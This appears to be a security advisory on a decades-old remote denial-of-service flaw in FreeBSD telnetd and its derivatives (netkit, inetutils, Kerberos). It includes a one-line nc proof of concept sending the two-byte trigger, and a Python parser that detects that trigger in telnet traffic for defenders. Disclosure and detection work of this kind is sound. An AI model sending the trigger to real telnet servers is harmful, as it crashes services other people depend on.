
2-byte Remote DoS in FreeBSD telnetd

FreeBSD-telnetd, NetBSD-telnetd, netkit-telnetd, telnetd in Kerberos Version 5 Applications and inetutils-telnetd are standard telnet servers used in several Linux distributions, BSD systems, UNIX systems and commercial products:

  • FreeBSD, NetBSD
  • Debian, Fedora, Gentoo, ArchLinux, … – using inetutils-telnetd or netkit-telnetd
  • specific Palo Alto appliances
  • specific Cisco appliances
  • specific Brocade appliances
  • specific Arista appliances
  • OS running telnetd from Kerberos Version 5 Applications: this may include BSD 4.3 Reno, UNICOS 5.1 to UNICOS 7.0, SunOs 3.5 to SunOs 4.1, DYNIX V3.0.17.9 and Ultrix 3.1 to Ultrix 4.0. Note that these operating systems may be end-of-life.

From our understanding, the first implementation containing the vulnerabilities dates from February 1991. This is the Kerberos telnetd implementation available at https://github.com/krb5/krb5-appl/blob/f8420ba3e60160da670f4f9a5b9f5429f67cd174/telnet/telnetd.

This code was merged into FreeBSD in the 90s. netkit-telnetd then derives from a very old version of the FreeBSD telnetd, and inetutils-telnetd is in turn a fork of netkit-telnetd.

These vulnerabilities are very old (at least 30 years).

In all these implementations, the vulnerable part of the code base has not been updated for 30 years and appears not to be maintained anymore.

Part of the list of affected products was obtained by using CVE-2020-10188 (a vulnerability in netkit-telnetd): advisories from Cisco, Palo Alto, Brocade and Arista reference CVE-2020-10188 in their products.

Furthermore, from https://github.com/krb5/krb5-appl/blob/f8420ba3e60160da670f4f9a5b9f5429f67cd174/telnet/README, the release date is February 22, 1991 and the supported operating systems are BSD 4.3 Reno, UNICOS 5.1 to UNICOS 7.0, SunOs 3.5 to SunOs 4.1, DYNIX V3.0.17.9 and Ultrix 3.1 to Ultrix 4.0. We can assume these operating systems running kerberos-telnetd are also vulnerable.

It is possible to remotely crash the "standard" FreeBSD telnetd server by sending 2 bytes (\xff\xf7) from the network, as shown below:

kali% printf "\xff\xf7" | nc -n -v 192.168.1.200 23
(UNKNOWN) [192.168.1.200] 23 (telnet) open
<FF><FD>%
kali%
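As an added example (not part of the advisory or of any of the telnetd projects named above), a small Python parser that walks a client-to-server telnet byte stream and reports the offset of every IAC EC (0xff 0xf7) command, the two-byte trigger shown in the session above, while correctly skipping ordinary option negotiation, escaped 0xff data bytes and sub-negotiation bodies so that a 0xf7 data byte is not mistaken for the command. The sample payloads are constructed, not captured traffic.

```python
IAC, SE, SB = 0xFF, 0xF0, 0xFA
EC = 0xF7                                   # telnet Erase Character command
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE
NEGOTIATION = {WILL, WONT, DO, DONT}        # three-byte IAC <cmd> <option>

def parse_telnet_commands(payload: bytes) -> list:
    """Return (offset, command, option) for every IAC command in a telnet
    byte stream, skipping literal data, escaped 0xff 0xff and SB...SE bodies."""
    cmds, i, n = [], 0, len(payload)
    while i < n:
        if payload[i] != IAC:
            i += 1
            continue
        if i + 1 >= n:                      # lone trailing IAC: truncated
            break
        cmd = payload[i + 1]
        if cmd == IAC:                      # IAC IAC is an escaped data byte
            i += 2
        elif cmd in NEGOTIATION:
            cmds.append((i, cmd, payload[i + 2] if i + 2 < n else None))
            i += 3
        elif cmd == SB:                     # sub-negotiation: scan to IAC SE
            cmds.append((i, cmd, payload[i + 2] if i + 2 < n else None))
            j = i + 2
            while j < n:
                if payload[j] == IAC:
                    if j + 1 < n and payload[j + 1] == SE:
                        j += 2
                        break
                    j += 2                  # escaped IAC inside the body
                else:
                    j += 1
            i = j
        else:                               # two-byte command: EC, EL, NOP, ...
            cmds.append((i, cmd, None))
            i += 2
    return cmds

def flag_iac_ec(payload: bytes) -> list:
    """Offsets of every IAC EC (0xff 0xf7) command, the advisory's trigger."""
    return [off for off, cmd, _ in parse_telnet_commands(payload) if cmd == EC]

# Constructed sample payloads (hypothetical, not captured traffic):
TRIGGER = b"\xff\xf7"                               # the advisory's two bytes
BENIGN = b"\xff\xfd\x18login\r\n"                   # IAC DO TERMINAL-TYPE + text
ESCAPED = b"data\xff\xff\xf7more"                   # escaped 0xff, literal 0xf7
HIDDEN = b"\xff\xfa\x18\x00xterm\xff\xf0\xff\xf7"   # SB...SE, then IAC EC at 11
```

Fed with the payload of a telnet session's first client packet, `flag_iac_ec` returning a non-empty list before any login has completed is a reasonable signal for a sensor rule, since a legitimate client has no reason to erase characters before the server has even negotiated options.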


Posted by SH
